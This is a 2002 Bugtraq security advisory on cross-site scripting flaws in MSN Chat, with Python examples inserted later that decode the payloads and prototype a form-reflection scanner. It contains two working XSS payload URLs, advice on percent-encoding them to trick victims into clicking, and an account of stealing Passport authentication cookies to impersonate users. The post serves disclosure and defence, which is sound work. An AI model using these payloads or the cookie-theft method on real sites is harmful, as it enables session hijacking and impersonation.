List: bugtraq
Subject: Fun With MSN Chat Part I (Cross Scripting)
From: John Heasman <john.heasman@univ.ox.ac.uk>
Date: 2002-03-29 17:06:49
Hi. Seeing as there has been a recent discussion
about cross scripting on high profile sites, I thought it
timely to release details of cross script opportunities
on MSN's chat service.
[Introduction]
MSN Chat is an IRCX network with a web-based client (an ActiveX control). Cross scripting (cross-site scripting, XSS) has been discussed at length elsewhere so I won't describe it here. MSN have been notified about this advisory.
[Details]
Here are two cross scripting situations. URL encoding (%XX escapes) is used to pass the characters the form would otherwise reject, such as < and >; percent-encoding the whole of the script portion further obfuscates the URL, making it easier to trick a user into clicking it.
http://chat.msn.com/chatroom.msnw?rm=%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E
Note: A URL similar to the one above may be obtained by using the form on http://chat.msn.com/create.msnw to create a room. The form provides some basic client-side validation to check for illegal characters (< and >), but nothing stops an attacker from constructing the request URL by hand, so the check is bypassed simply by not using the form. This advisory goes to show that client-side checking on its own has very little security value (IMHO).
http://chat.msn.com/invite.msnw?hexUserName=%3Cscript%3Ealert(document.cookie)%3B%3C%5c%2Fscript%3E&hexnick=AAAAA&InvitationCode=123456789&mode=2
Note: As this value is reflected inside a quoted string, the / in the closing script tag has had to be escaped as \/ (%5c%2F above) so that the enclosing script block is not terminated early.
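To make the encoding points above concrete, here is an added example (not part of the advisory) that decodes the two URLs as a server would see them, shows that a browser-side check for < and > never runs when the URL is built by hand, and contrasts verbatim reflection with HTML-escaped reflection. The URLs are the advisory's own; the render_* functions, the client_side_ok check and the assumption that the invite.msnw value is placed into a double-quoted JavaScript string are hypothetical stand-ins for the server side.

```python
"""Decode the two advisory URLs, show that a create.msnw-style client-side
check cannot protect the server, and contrast verbatim reflection with
HTML-escaped reflection. Added example: the URLs are the advisory's, the
render_* functions are hypothetical stand-ins for the server side."""
import html
import json
import re
from urllib.parse import parse_qs, urlsplit

# Advisory URL 1 (payload in the room-name parameter).
CHATROOM_URL = ("http://chat.msn.com/chatroom.msnw?rm="
                "%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E")
# Advisory URL 2 (payload reflected inside a quoted string, hence %5c%2F).
INVITE_URL = ("http://chat.msn.com/invite.msnw?hexUserName="
              "%3Cscript%3Ealert(document.cookie)%3B%3C%5c%2Fscript%3E"
              "&hexnick=AAAAA&InvitationCode=123456789&mode=2")
PAYLOAD = "<script>alert(document.cookie);</script>"


def decoded_param(url, name):
    """The percent-decoded value of one query parameter, as the server sees it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]


def client_side_ok(room_name):
    """Stand-in for the create.msnw form check: reject names containing < or >.
    It runs in the browser, so an attacker who builds the URL by hand never runs it."""
    return "<" not in room_name and ">" not in room_name


def render_unsafe(room_name):
    """Hypothetical vulnerable server: reflects the parameter verbatim into HTML."""
    return "<h1>Joining room %s</h1>" % room_name


def render_escaped(room_name):
    """Hardened form: HTML-escape (including quotes) before reflecting."""
    return "<h1>Joining room %s</h1>" % html.escape(room_name, quote=True)


def contains_script_tag(page):
    """True if the rendered page contains a <script> opening tag."""
    return re.search(r"<script\b", page, re.IGNORECASE) is not None


def js_string_value(literal_body):
    """Runtime value of a double-quoted JS string literal with this body
    (assumed context for the invite.msnw value). JSON's escape rules cover
    the \\/ escape, so json.loads is sufficient: the HTML parser never sees a
    literal </script>, but the script itself does once the string is evaluated."""
    return json.loads('"%s"' % literal_body)


def obfuscate(text):
    """Percent-encode every byte: the 'encode the whole script part' trick from
    the advisory (urllib's quote() would leave letters and digits readable)."""
    return "".join("%%%02X" % b for b in text.encode("utf-8"))


if __name__ == "__main__":
    rm = decoded_param(CHATROOM_URL, "rm")
    print("decoded rm            :", rm)
    print("form would accept it  :", client_side_ok(rm))
    print("unsafe render has tag :", contains_script_tag(render_unsafe(rm)))
    print("escaped render has tag:", contains_script_tag(render_escaped(rm)))
    print("invite value at runtime:", js_string_value(decoded_param(INVITE_URL, "hexUserName")))
    print("fully obfuscated      :", obfuscate(PAYLOAD))
```

Running the script shows the room name arriving at the server with its angle brackets intact even though the form check would have rejected it, and the fully percent-encoded form of the payload in which not even the word "script" is readable.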
The implication of the two URLs above is that Passport cookies in the msn.com domain can be stolen by tricking a user into visiting a malicious web page or following a malicious link. This can be achieved easily since the MSN chat control conveniently turns any string beginning with http:// into a clickable link.
The first URL limits the number of characters that can be present in the cross script, since the parameter is the name of the chat room the victim supposedly wishes to join. The chat control will also throw an error about illegal characters in the chat room name if the page is allowed to load fully (so it is better to end the cross script with window.location="about::"; if there is room). The second URL has no such limitation.
Let us now discuss the implications for MSN Chat. The above URLs enable an attacker to impersonate another user on the chat service and alter his/her nickname and profile. The three cookies of interest are:
MSPProf (profile information)
MSPAuth (authentication information)
MSNChatNN (nickname)
It is also possible for an attacker to use only the victim's MSNChatNN cookie, thus stealing his nickname but not his identity as such. Some chat room operators use non-MSN clients to allow use of more advanced IRCX commands, e.g. the ACCESS command to auto-host a user depending on nickname/identity. Obviously this is not a good idea in light of this bug, since neither nickname nor identity can be trusted.
[About Cross Scripting in general]
I would agree with earlier postings about the extent of
cross scripting vulnerabilities. I visited a number of
UK retailers' websites and I would say that 80 - 90%
were vulnerable to cross scripting. I was (am?)
planning to release a list or attempt to contact site
admins to inform them. This got me thinking about
automating detection of cross scripting
vulnerabilities - at the basic level, scanning a page for
any forms, returning the form with some arbitrary
input then scanning the returned page for that same
input. Of course this is largely simplified but it is an
interesting idea. If anyone is interested in discussing
this, please get in contact.
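As an added example (not the author's code), here is a prototype of the detection idea sketched above: discover the forms on a page, submit a unique probe in each fillable field, and report the fields whose probe is reflected. It goes one step beyond the sketch by putting < " ' into the probe and only reporting fields where those characters survive unencoded, since a server that escapes on output is not exploitable. CONSTRUCTED_PAGE and fake_site are made-up stand-ins for a target site so that the whole thing runs offline; against a real site, submit() would be replaced by an HTTP client.

```python
"""Prototype of the form-reflection check: find forms, submit a unique probe in
each fillable field, report fields whose probe returns with its metacharacters
intact. Added example; CONSTRUCTED_PAGE and fake_site are constructed stand-ins
for a target site, so nothing here touches the network."""
import html
import secrets
from html.parser import HTMLParser


class FormCollector(HTMLParser):
    """Collect each form's action, method and the names of its fillable fields."""
    FILLABLE = {"text", "search", "hidden", "url", "email"}

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif self._current is not None and tag in ("input", "textarea") and a.get("name"):
            if tag == "textarea" or (a.get("type") or "text").lower() in self.FILLABLE:
                self._current["fields"].append(a["name"])

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def discover_forms(page_html):
    """Return [(action, method, [field names]), ...] for every form on the page."""
    collector = FormCollector()
    collector.feed(page_html)
    return [(f["action"], f["method"], f["fields"]) for f in collector.forms]


def probe_forms(page_html, submit):
    """submit(action, method, params) returns the response body for one submission.
    Returns (action, field) pairs whose probe came back unencoded. Each probe
    carries < " ' so a server that escapes on output is not reported."""
    findings = []
    for action, method, fields in discover_forms(page_html):
        for field in fields:
            probe = 'xs%s<"\'' % secrets.token_hex(4)   # unique per request
            params = {name: "benign" for name in fields}
            params[field] = probe
            if probe in submit(action, method, params):
                findings.append((action, field))
    return findings


# Constructed page with two forms; the first mimics a create-room form with an rm field.
CONSTRUCTED_PAGE = """
<html><body>
<form action="/create.msnw" method="get">
  Room name: <input type="text" name="rm">
  <input type="hidden" name="mode" value="2">
  <input type="submit" value="Create">
</form>
<form action="/search" method="get">
  <input type="search" name="q"> <input type="submit" value="Go">
</form>
</body></html>
"""


def fake_site(action, method, params):
    """Constructed stand-in for the target: /create.msnw reflects rm verbatim
    (vulnerable) but escapes mode; /search escapes q (safe)."""
    if action == "/create.msnw":
        return "<h1>Room %s created (mode %s)</h1>" % (
            params["rm"], html.escape(params["mode"], quote=True))
    if action == "/search":
        return "<p>Results for %s</p>" % html.escape(params["q"], quote=True)
    return ""


if __name__ == "__main__":
    for action, field in probe_forms(CONSTRUCTED_PAGE, fake_site):
        print("unencoded reflection: %s parameter %r" % (action, field))
```

The probe is randomised per request so that a value cached or echoed from an earlier submission cannot produce a false hit, and hidden fields are probed too, because an attacker crafting a link controls them just as much as the visible ones.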
[The Obligatory Greetings]
.ox ppl I know & the boyz@103 :)
Thanks
John
-------------------------------------------
john.heasman@univ.ox.ac.uk
-------------------------------------------